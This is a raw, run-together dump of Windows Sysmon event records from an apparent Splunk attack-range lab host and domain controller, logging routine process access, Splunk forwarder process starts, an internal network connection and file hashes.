11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1850-6216-2405-000000003902}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1850-6216-2405-000000003902}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-1850-6216-2405-000000003902}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000221884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:43.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51681-false10.0.1.12-8000- 23542300x8000000000000000221883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:45.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0900D993E58A24E8167EAE0F1DDD0CE,SHA256=FC37FF00C7C32C0D8DAF5F3BCB5339B79902BDD0772FEED0BC18408BDFF6946D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:45.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AF2B4E8C7742F3CF14E3AD5EDB32F6D,SHA256=29365ABD4058A6D8F1652685E77EBF678AE0C1CCC27D1D322BE474217B7559E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:45.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=224FBB58E8454001F8D25E085EBCDC1D,SHA256=70CBDC984C916411F9444BB4C81CFCF61D3451BD1F8BA02789099C6B9C2F5091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:45.457{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B694E54789519DF9DEC5705E660F26E6,SHA256=8C588C76F4ADBA08B37EF53F05FFAE8EE5898EE735B29A42C9BAC68F17896A9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:45.103{4F8D34B0-1850-6216-2505-000000003902}34242948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.635{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1852-6216-2605-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1852-6216-2605-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.603{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1852-6216-2605-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.604{4F8D34B0-1852-6216-2605-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.431{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2B645B93A662B7459990A6188755E91,SHA256=620839F1C78E3B70689D21D41EDF325CC93091F14B35D6DE36F42A5344467891,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 